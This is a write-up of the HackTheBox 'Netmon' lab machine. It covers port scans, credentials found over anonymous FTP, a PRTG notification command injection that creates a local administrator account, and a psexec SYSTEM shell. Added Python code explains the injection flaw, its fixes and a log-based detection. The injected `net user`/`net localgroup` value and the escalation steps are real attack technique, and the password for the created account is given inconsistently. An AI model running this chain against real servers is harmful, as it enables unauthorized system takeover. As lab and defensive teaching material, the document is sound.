#windows #hackthebox #easy

![[Pasted image 20250615134211.png]]

---

# Port Scanning - Nmap

Scanned all TCP ports to get an overview of which ports are open.

```bash
┌──(parallels㉿kali-linux-2024-2)-[~/Desktop]
└─$ sudo nmap -sS 10.10.10.152 -Pn -n --open --min-rate 3000 -p-
[sudo] password for parallels:
Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-15 13:49 CDT
Nmap scan report for 10.10.10.152
Host is up (0.050s latency).
Not shown: 64184 closed tcp ports (reset), 1338 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT      STATE SERVICE
21/tcp    open  ftp
80/tcp    open  http
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
5985/tcp  open  wsman
47001/tcp open  winrm
49664/tcp open  unknown
49665/tcp open  unknown
49666/tcp open  unknown
49667/tcp open  unknown
49668/tcp open  unknown
49669/tcp open  unknown

Nmap done: 1 IP address (1 host up) scanned in 18.53 seconds
```

Then performed another scan on those open ports, this time with the `-sC` and `-sV` options.

```bash
┌──(parallels㉿kali-linux-2024-2)-[~/Desktop]
└─$ nmap -sCV 10.10.10.152 -p 21,80,135,139,445,5985,47001,49664-49669
Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-15 13:52 CDT
Nmap scan report for 10.10.10.152
Host is up (0.050s latency).

PORT      STATE SERVICE      VERSION
21/tcp    open  ftp          Microsoft ftpd
| ftp-syst: 
|_  SYST: Windows_NT
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 02-03-19  12:18AM                 1024 .rnd
| 02-25-19  10:15PM       <DIR>          inetpub
| 07-16-16  09:18AM       <DIR>          PerfLogs
| 02-25-19  10:56PM       <DIR>          Program Files
| 02-03-19  12:28AM       <DIR>          Program Files (x86)
| 02-03-19  08:08AM       <DIR>          Users
|_11-10-23  10:20AM       <DIR>          Windows
80/tcp    open  http         Indy httpd 18.1.37.13946 (Paessler PRTG bandwidth monitor)
|_http-trane-info: Problem with XML parsing of /evox/about
|_http-server-header: PRTG/18.1.37.13946
| http-title: Welcome | PRTG Network Monitor (NETMON)
|_Requested resource was /index.htm
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
5985/tcp  open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
47001/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49664/tcp open  msrpc        Microsoft Windows RPC
49665/tcp open  msrpc        Microsoft Windows RPC
49666/tcp open  msrpc        Microsoft Windows RPC
49667/tcp open  msrpc        Microsoft Windows RPC
49668/tcp open  msrpc        Microsoft Windows RPC
49669/tcp open  msrpc        Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-time: 
|   date: 2025-06-15T18:53:49
|_  start_date: 2025-06-15T18:41:43
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 63.91 seconds
```

No open UDP ports. Well, at least none among the top 1,000 ports.

```bash
┌──(parallels㉿kali-linux-2024-2)-[~/Desktop]
└─$ nmap -sU 10.10.10.152 --min-rate 3000 --top-ports 1000
Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-15 13:57 CDT
Nmap scan report for 10.10.10.152
Host is up (0.058s latency).
Not shown: 999 open|filtered udp ports (no-response)
PORT      STATE  SERVICE
36384/udp closed unknown

Nmap done: 1 IP address (1 host up) scanned in 1.16 seconds
```

# Footprinting

### FTP 21

As we can see from the nmap output, FTP allows anonymous login. Let's take a look at the FTP server first.

```bash
┌──(parallels㉿kali-linux-2024-2)-[~/Desktop]
└─$ ftp $IP
Connected to 10.10.10.152.
220 Microsoft FTP Service
Name (10.10.10.152:parallels): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password: 
230 User logged in.
Remote system type is Windows_NT.
ftp> ls
229 Entering Extended Passive Mode (|||50035|)
150 Opening ASCII mode data connection.
02-03-19  12:18AM                 1024 .rnd
02-25-19  10:15PM       <DIR>          inetpub
07-16-16  09:18AM       <DIR>          PerfLogs
02-25-19  10:56PM       <DIR>          Program Files
02-03-19  12:28AM       <DIR>          Program Files (x86)
02-03-19  08:08AM       <DIR>          Users
11-10-23  10:20AM       <DIR>          Windows
226 Transfer complete.
```

In the path `/Users/Public/Desktop`, there is a `user.txt` and two `.lnk` files, which I downloaded; the `user.txt` file turned out to be the actual user flag.

```bash
ftp> pwd
Remote directory: /Users/Public/Desktop
ftp> ls
229 Entering Extended Passive Mode (|||50059|)
150 Opening ASCII mode data connection.
02-03-19  12:18AM                 1195 PRTG Enterprise Console.lnk
02-03-19  12:18AM                 1160 PRTG Network Monitor.lnk
06-15-25  02:42PM                   34 user.txt
226 Transfer complete.
```

```bash
┌──(parallels㉿kali-linux-2024-2)-[~/Desktop]
└─$ cat user.txt
da47...
```

### HTTP 80

- I was prompted to enter creds, but I haven't found any creds yet. Skipping this for now.
- I tried the default credentials `prtgadmin:prtgadmin` found in https://www.exploit-db.com/exploits/46527, but they didn't work.

### SMB 445

Tried a null session with `smbclient`, but it didn't work. `smbmap` and `enum4linux` didn't reveal anything of interest either.

### HTTP 5985 & 47001

Not found.

### FTP 21 - Again

At this point, I couldn't enumerate anything on any port except port 21, so I logged back into the FTP server with anonymous login. This time I used the `ls -la` command to reveal everything, including hidden directories, and traversed to the `ProgramData` folder, in which I found the `Paessler` and `PRTG Network Monitor` directories. I downloaded all 4 of the files that start with `PRTG Configuration.` with `mget PRTG Configuration*`.

```bash
229 Entering Extended Passive Mode (|||50718|)
150 Opening ASCII mode data connection.
06-15-25  03:23PM       <DIR>          Configuration Auto-Backups
06-15-25  02:42PM       <DIR>          Log Database
02-03-19  12:18AM       <DIR>          Logs (Debug)
02-03-19  12:18AM       <DIR>          Logs (Sensors)
02-03-19  12:18AM       <DIR>          Logs (System)
06-15-25  02:42PM       <DIR>          Logs (Web Server)
06-15-25  02:47PM       <DIR>          Monitoring Database
02-25-19  10:54PM              1189697 PRTG Configuration.dat
02-25-19  10:54PM              1189697 PRTG Configuration.old
07-14-18  03:13AM              1153755 PRTG Configuration.old.bak
06-15-25  03:23PM              1680954 PRTG Graph Data Cache.dat
02-25-19  11:00PM       <DIR>          Report PDFs
02-03-19  12:18AM       <DIR>          System Information Database
02-03-19  12:40AM       <DIR>          Ticket Database
02-03-19  12:18AM       <DIR>          ToDo Database
```

I looked through all 4 of the downloaded files and finally found a set of credentials inside the `PRTG Configuration.old.bak` file.

Found credentials: `prtgadmin:PrTg@dmin2018`

![[Pasted image 20250615145017.png]]

Unfortunately, the password I found was still not valid.

![[Pasted image 20250615150430.png]]

Then I thought to try the password `PrTg@dmin2019` instead of "2018", and it worked. Come to think of it, it all makes sense: the creds I found were in a file named `PRTG Configuration.old.bak`, which indicates it's an "old" backup file.

After successfully logging in, I was lost for a long time. Then I decided to refer to `0xdf`'s writeup.

So the following exploit is not original but referenced from `0xdf` and others.

Navigate to `Setup` -> `Notifications` under Account Settings and click the `+` sign to 'add new notification'. Scroll to the bottom and check `Execute Program`. The Parameter field is what's vulnerable and leads to the exploit. We are going to inject the following into the field:

`test.txt;net user wook wook413 /add;net localgroup administrators wook /add`

Let me break down the command:

- `test.txt` is just a random harmless value.
- `;`: command separator, which allows the execution of the following commands.
- `net user wook wook413 /add`: adds a new user named `wook` with the password `wook413` to the system.
- `net localgroup administrators wook /add`: adds the newly created **wook** user to the **Administrators** group, giving it local admin privileges.

![[Pasted image 20250615151838.png]]

![[Pasted image 20250615155219.png]]

Upon hitting save, you are back on this screen. Click the far-right icon of your newly created notification and select the bell-shaped icon at the very top.

![[Pasted image 20250615154440.png]]

It says a test notification was triggered and queued for delivery.

![[Pasted image 20250615154614.png]]

After waiting a few seconds, I tried `smbclient` and `smbmap` to see if listing shares would work with the newly created account `wook:w00k413!`, and they did!

```bash
┌──(parallels㉿kali-linux-2024-2)-[~/Desktop]
└─$ smbclient -L //$IP/ -U 'wook%w00k413!'

	Sharename       Type      Comment
	---------       ----      -------
	ADMIN$          Disk      Remote Admin
	C$              Disk      Default share
	IPC$            IPC       Remote IPC
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.10.152 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
```

smbmap

```bash
┌──(parallels㉿kali-linux-2024-2)-[~/Desktop]
└─$ smbmap -H $IP -u wook -p 'w00k413!'

    ________  ___      ___  _______   ___      ___       __         _______
   /"       )|"  \    /"  ||   _  "\ |"  \    /"  |     /""\       |   __ "\
  (:   \___/  \   \  //   |(. |_)  :) \   \  //   |    /    \      (.
|__) :)
   \___  \    /\  \/.    ||:     \/   /\  \/.    |   /' /\  \     |:  ____/
    __/  \   |: \.        |(|  _  \   |: \.        |  //  __'  \    (|  /
   /" \   :) |.  \    /:  ||: |_)  :)|.  \    /:  | /   /  \   \  /|__/ \
  (_______/  |___|\__/|___|(_______/ |___|\__/|___|(___/    \___)(_______)
-----------------------------------------------------------------------------
SMBMap - Samba Share Enumerator v1.10.7 | Shawn Evans - [email protected]
                     https://github.com/ShawnDEvans/smbmap

[\] Checking for open ports...
[|] Checking for open ports...
[*] Detected 1 hosts serving SMB
[/] Authenticating...
[-] Authenticating...
[\] Authenticating...
[|] Authenticating...
[/] Authenticating...
[*] Established 1 SMB connections(s) and 1 authenticated session(s)
[-] Enumerating shares...
[+] IP: 10.10.10.152:445	Name: 10.10.10.152        	Status: ADMIN!!!
	Disk                                                  	Permissions	Comment
	----                                                  	-----------	-------
	ADMIN$                                            	READ, WRITE	Remote Admin
	C$                                                	READ, WRITE	Default share
	IPC$                                              	READ ONLY	Remote IPC
```

From here, we have many different options to get a shell as administrator, but here we are going to use `psexec.py`.

```bash
┌──(parallels㉿kali-linux-2024-2)-[~/Desktop]
└─$ psexec.py 'wook:w00k413!'@$IP
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies

[*] Requesting shares on 10.10.10.152.....
[*] Found writable share ADMIN$
[*] Uploading file uSbNnSbL.exe
[*] Opening SVCManager on 10.10.10.152.....
[*] Creating service IPZa on 10.10.10.152.....
[*] Starting service IPZa.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

C:\Windows\system32> whoami
nt authority\system
```

Found `root.txt`!

```powershell
C:\Users\Administrator\Desktop> dir
 Volume in drive C has no label.
 Volume Serial Number is 0EF5-E5E5

 Directory of C:\Users\Administrator\Desktop

02/03/2019  12:35 AM    <DIR>          .
02/03/2019  12:35 AM    <DIR>          ..
06/15/2025  02:42 PM                34 root.txt
               1 File(s)             34 bytes
               2 Dir(s)   6,735,409,152 bytes free

C:\Users\Administrator\Desktop> type root.txt
a46b...
```
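Why the `;` in the Execute Program parameter field turns into command execution: the parameter value is joined into a command line and handed to a shell, and it is the shell, not the notification program, that treats `;` as a separator. The following is an added illustration of that bug class and its two usual fixes; it is not PRTG's code and not part of the original writeup. The notification program is stood in for by `echo`, the `net` commands are replaced with a harmless `echo INJECTED` marker, and a POSIX shell is assumed instead of cmd.exe, so the quoting differs from Windows while the separator behaviour is the same. The allow-list pattern is an assumption chosen for the demo.

```python
"""Added example: string-built shell command vs. argv vs. allow-list.

Not PRTG's code. 'echo' stands in for the configured notification program
and a POSIX /bin/sh is assumed (cmd.exe splits on ';' the same way via
'&', but the quoting rules differ).
"""
import re
import subprocess

# Constructed parameter modelled on the writeup's injection, with the
# 'net user' / 'net localgroup' part swapped for a harmless marker.
INJECTED_PARAMETER = "test.txt; echo INJECTED"


def run_notification_vulnerable(program: str, parameter: str) -> str:
    """Builds 'program parameter' as one string and gives it to a shell.

    The shell parses ';' as a command separator, so everything the user
    typed after it runs as a second command with the service's privileges.
    """
    command = f"{program} {parameter}"
    result = subprocess.run(command, shell=True, capture_output=True,
                            text=True, check=False)
    return result.stdout


def run_notification_argv(program: str, parameter: str) -> str:
    """Fix 1: pass the parameter as a single argv element.

    No shell is involved, so ';' is just a byte inside one argument and
    the program receives the whole string as its parameter.
    """
    result = subprocess.run([program, parameter], capture_output=True,
                            text=True, check=False)
    return result.stdout


# Fix 2: only accept what a notification parameter legitimately needs.
# The pattern is an assumption for this demo (filename-like tokens only).
PARAMETER_ALLOWLIST = re.compile(r"[A-Za-z0-9._-]+")


def validate_parameter(parameter: str) -> bool:
    """True only if the parameter is made of allow-listed characters."""
    return PARAMETER_ALLOWLIST.fullmatch(parameter) is not None


def run_notification_hardened(program: str, parameter: str) -> str:
    """Allow-list first, then argv execution: defence in depth."""
    if not validate_parameter(parameter):
        raise ValueError(f"rejected notification parameter: {parameter!r}")
    return run_notification_argv(program, parameter)


if __name__ == "__main__":
    print("vulnerable:", repr(run_notification_vulnerable("echo", INJECTED_PARAMETER)))
    print("argv only: ", repr(run_notification_argv("echo", INJECTED_PARAMETER)))
    try:
        run_notification_hardened("echo", INJECTED_PARAMETER)
    except ValueError as err:
        print("hardened:  ", err)
```

The vulnerable path prints two lines (the marker ran as its own command), the argv path prints the whole parameter as one literal string, and the hardened path refuses the value before anything executes. Passing argv alone already removes the separator problem; the allow-list additionally stops the parameter from being abused as an option to the program itself.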
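From the defender's side, the injected `net user ... /add; net localgroup administrators ... /add` sequence leaves a distinctive trail in the Windows Security log: event 4720 (user account created) followed within seconds by 4732 (member added to a security-enabled local group) where the group is BUILTIN\Administrators (SID `S-1-5-32-544`), and the subject of both events is the account the PRTG service runs as rather than an interactive administrator. The detection below is an added example, not part of the writeup. Its event records are constructed to mimic the relevant fields of those two events (the `NETMON$` subject, the timestamps and the account SIDs are made up), and it relies on the fact that a process running as LocalSystem is logged with the computer account (`HOSTNAME$`) as `SubjectUserName`.

```python
"""Added example (not from the writeup): flag a local account that becomes
a member of BUILTIN\\Administrators within a short window of its creation.

Input is a list of dicts shaped like the relevant fields of Security
events 4720 and 4732. The records here are constructed for the demo.
"""
from datetime import datetime, timedelta

ADMINISTRATORS_SID = "S-1-5-32-544"   # BUILTIN\Administrators
BACKUP_OPERATORS_SID = "S-1-5-32-551"  # BUILTIN\Backup Operators (negative case)

# Constructed sample events. A LocalSystem service appears as the machine
# account 'NETMON$' in SubjectUserName; 'Administrator' is an interactive admin.
SAMPLE_EVENTS = [
    {"EventID": 4720, "TimeCreated": "2025-06-15T15:41:10",
     "SubjectUserName": "NETMON$", "TargetUserName": "wook",
     "TargetSid": "S-1-5-21-1111-2222-3333-1001"},
    {"EventID": 4732, "TimeCreated": "2025-06-15T15:41:11",
     "SubjectUserName": "NETMON$", "TargetUserName": "Administrators",
     "MemberSid": "S-1-5-21-1111-2222-3333-1001", "TargetSid": ADMINISTRATORS_SID},
    # Routine provisioning: a service account added to Backup Operators hours later.
    {"EventID": 4720, "TimeCreated": "2025-06-15T09:00:00",
     "SubjectUserName": "Administrator", "TargetUserName": "svc_backup",
     "TargetSid": "S-1-5-21-1111-2222-3333-1002"},
    {"EventID": 4732, "TimeCreated": "2025-06-15T11:30:00",
     "SubjectUserName": "Administrator", "TargetUserName": "Backup Operators",
     "MemberSid": "S-1-5-21-1111-2222-3333-1002", "TargetSid": BACKUP_OPERATORS_SID},
]


def parse_time(value: str) -> datetime:
    """Security event timestamps in the sample are ISO 8601 strings."""
    return datetime.fromisoformat(value)


def find_rapid_admin_creation(events, window_seconds: int = 300):
    """Pair each 4732-to-Administrators with the 4720 that created the member.

    Returns one finding per pair whose creation-to-admin gap is within
    window_seconds. Each finding records who did it and whether the subject
    was a machine account, i.e. a service rather than a person.
    """
    creations = {e["TargetSid"]: e for e in events if e["EventID"] == 4720}
    findings = []
    for event in sorted(events, key=lambda e: parse_time(e["TimeCreated"])):
        if event["EventID"] != 4732 or event.get("TargetSid") != ADMINISTRATORS_SID:
            continue
        created = creations.get(event.get("MemberSid"))
        if created is None:
            continue  # member existed before this log window
        gap = parse_time(event["TimeCreated"]) - parse_time(created["TimeCreated"])
        if timedelta(0) <= gap <= timedelta(seconds=window_seconds):
            subject = created["SubjectUserName"]
            findings.append({
                "account": created["TargetUserName"],
                "created_by": subject,
                "seconds_to_admin": int(gap.total_seconds()),
                "created_by_machine_account": subject.endswith("$"),
            })
    return findings


if __name__ == "__main__":
    for finding in find_rapid_admin_creation(SAMPLE_EVENTS):
        print(finding)
```

Run against the sample, only the `wook` pair is reported: created and promoted one second apart by `NETMON$`. The `svc_backup` records are ignored both because the group is not Administrators and because the gap is hours. In a real deployment the `created_by_machine_account` flag is the strong signal here; a monitoring product's service context has no business creating local administrators, whatever the timing.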